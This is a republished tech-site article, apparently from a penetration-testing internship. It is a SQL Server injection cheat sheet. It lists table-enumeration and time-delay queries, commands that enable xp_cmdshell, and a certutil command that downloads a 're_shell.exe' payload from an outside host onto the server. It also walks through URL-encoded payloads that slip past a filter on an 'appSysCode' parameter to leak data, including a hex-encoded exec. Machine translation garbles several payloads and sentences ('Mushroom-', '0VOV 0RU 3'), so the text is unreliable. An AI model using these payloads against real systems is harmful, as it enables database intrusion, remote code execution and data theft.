Shulou(Shulou.com)05/31 Report--

This article will explain in detail how to carry out SQL Server injection analysis, the content of the article is of high quality, so the editor will share it for you as a reference. I hope you will have a certain understanding of the relevant knowledge after reading this article.

In the penetration testing project of internship, most of the database systems encountered are SQL Server. It can be regarded as an important process of understanding and being familiar with Mssql.

Get all the tables in a database (assuming the library name is fooDB)

-- XType='U': represents all user tables

-- XType='S': represents all system tables

SELECTname FROM fooDB..sysobjects Where xtype='U'

Get all the field names of a table (assuming the table name is fooTable)

SELECTname FROM SysColumns WHERE id=Object_id ('fooTable')

Delayed injection

SELECT* FROM fooTable WHERE id=1 WAITFOR DELAY '0VOV 0RU 3'

2. Common built-in functions

Db_name ()-- current library name

User-- current user name

Suser_name ()-- login user name

3. Like query case-sensitive mode

SELECT* FROM dt WHERE columnname COLLATE Chinese_PRC_CS_AS LIKE 'aa%';

Give an example to analyze Chinese_PRC_CS_AI_WS:

The first half: refers to the UNICODE character set, and Chinese_PRC_ refers to the sorting rules for mainland simplified characters UNICODE.

_ BIN binary sort

Whether CI (CS) is case-sensitive, CI is not case-sensitive, CS is case-sensitive

Whether _ AI (AS) distinguishes stress, AI does not distinguish, AS distinguishes

Whether _ KI (KS) distinguishes katakana types, KI does not distinguish, KS distinguishes

Whether WI (WS) distinguishes width, WI does not distinguish, WS distinguishes

4. Implement limitm,n

Items 7 to 9 of the query results, such as limit 7pr 3 in MySql

Selecttop 3 id from tablename

Whereid not in (

Selecttop 6 id from tablename

)

Open the xp_cmdshell stored procedure

EXECsp_configure 'show advanced options', 1

RECONFIGURE

EXECsp_configure 'xp_cmdshell', 1

RECONFIGURE

To turn it off, just change the second 1 of the open statement to 0 and execute it.

Run command

Execmaster..xp_cmdshell "whoami"

Execmaster..xp_cmdshell "ping 127.0.0.1-n 5 > nul"

Execmaster..xp_cmdshell "certutil-urlcache-split-f http://IP/re_shell.exe D:\ re_shell.exe"

Thorough defense against xp_cmdshell approach: fix sql injection vulnerabilities, delete xplog70.dll components

And available:? key=aa'+and+db_name () > 1

And is not available:? key='%2buser () ^ 1

Convert conversion type:? key=a'%2b (convert (int,@@version))

; dEcLaRe @ s vArChAr (8000) sEt

@ s=0x73656c65637420636f6e7665727428696e742c404076657273696f6e29eXeC (@ s)--

2. An error will be reported when you enter single quotation marks around the example.

Try the comments of% 23 and-- +-to determine the back-end database system type. Return 200 and report an error when the statement goes wrong. The correct time is 302. It is known as mssql.

The server intercepts and filters the data and refuses to process the request. However, varchar ^ int can be used to expose the data.

? appSysCode='%2buser%5e1--+-

The intercept is a little good. Tried a lot of select methods, but it didn't work.

AppSysCode=a'%2b (select+'aaa')-+-

? appSysCode=a'%2b (select+1)% 5E1 Muhammad-

? appSysCode=a'%2b (convert (int, (select+'bbb')% 5e1Mushroom-(only an error is reported here)

? appSysCode=a'%2b (convert (varchar, (select+'bbb')% 5e1Mushroom-(here direct 302)

? appSysCode=a'%2b (convert (int, (select+'bbb'))-- +-

? appSysCode=a'%3bSELECT+11--+-

? appSysCode=a'%3bexec+xxxxx--+-

But there are still flaws in the rules.

? appSysCode=a'%3bselect+*+from+ (select+'aaa'+as+c) + T2 where does it go C% 5e1?

Arbitrary data can be revealed.

AppSysCode=a'%3bSELECT+name+FROM+master..sysdatabases+where+name%5e1%3e0+and+name+NOT+IN+ ('master','model','msdb','tempdb','northwind','pubs')-+-

This is the end of the analysis on how to carry out SQL Server injection. I hope the above content can be helpful to you and learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.